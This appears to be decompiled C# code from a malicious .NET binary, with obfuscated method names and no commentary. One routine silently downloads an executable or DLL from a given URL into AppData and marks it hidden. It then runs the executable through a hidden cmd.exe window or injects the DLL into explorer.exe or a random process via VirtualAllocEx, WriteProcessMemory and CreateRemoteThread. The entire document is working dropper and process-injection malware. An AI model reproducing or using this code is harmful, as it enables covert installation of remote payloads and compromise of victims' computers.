// Token: 0x060001D3 RID: 467 RVA: 0x0000EB20 File Offset: 0x0000CD20
public static int smethod_1(string string_0, Process process_0)
{
IntPtr intptr_ = Class20.OpenProcess(1082, false, process_0.Id);
IntPtr procAddress = Class20.GetProcAddress(Class20.GetModuleHandle("kernel32.dll"), "LoadLibraryA");
IntPtr intPtr = Class20.VirtualAllocEx(intptr_, IntPtr.Zero, (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), 12288U, 4U);
UIntPtr uintPtr;
Class20.WriteProcessMemory(intptr_, intPtr, Encoding.Default.GetBytes(string_0), (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), out uintPtr);
Class20.CreateRemoteThread(intptr_, IntPtr.Zero, 0U, procAddress, intPtr, 0U, IntPtr.Zero);
return(0);
}
// Token: 0x060001DD RID: 477 RVA: 0x0000EC58 File Offset: 0x0000CE58
public static bool smethod_4()
{
if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6)
{
bool result;
using (Process currentProcess = Process.GetCurrentProcess())
{
bool flag;
if (!Class20.IsWow64Process(currentProcess.Handle, out flag))
{
result = false;
}
else
{
result = flag;
}
}
return(result);
}
return(false);
}
// Token: 0x060001D4 RID: 468 RVA: 0x0000EBE0 File Offset: 0x0000CDE0
public static void smethod_2(string string_0)
{
try
{
Process process_;
if (Process.GetProcessesByName("explorer").Length != 0)
{
process_ = Process.GetProcessesByName("explorer")[0];
}
else
{
int maxValue = Process.GetProcesses().Length;
int num = new Random().Next(1, maxValue);
process_ = Process.GetProcesses()[num];
}
Class20.smethod_1(string_0, process_);
Class20.bool_0 = true;
}
catch
{
}
}
// Token: 0x060001D2 RID: 466 RVA: 0x0000E950 File Offset: 0x0000CB50
public static void smethod_0(string string_0, string string_1)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (string_0 != "")
{
if (string_1.EndsWith(".exe"))
{
try
{
if (File.Exists(folderPath + "\\" + string_1))
{
try
{
File.Delete(folderPath + "\\" + string_1);
}
catch
{
}
}
using (WebClient webClient = new WebClient())
{
webClient.DownloadFile(string_0, folderPath + "\\" + string_1);
}
File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
string str = folderPath + "\\" + string_1;
Process.Start(new ProcessStartInfo
{
UseShellExecute = true,
WorkingDirectory = "C:\\Windows\\System32",
FileName = "C:\\Windows\\System32\\cmd.exe",
Arguments = "/c " + str,
WindowStyle = ProcessWindowStyle.Hidden
});
return;
}
catch
{
return;
}
}
if (string_1.EndsWith(".dll"))
{
if (File.Exists(folderPath + "\\" + string_1))
{
try
{
File.Delete(folderPath + "\\" + string_1);
}
catch
{
}
}
try
{
using (WebClient webClient2 = new WebClient())
{
webClient2.DownloadFile(string_0, folderPath + "\\" + string_1);
}
File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
Class20.smethod_2(folderPath + "\\" + string_1);
}
catch
{
}
}
}
}
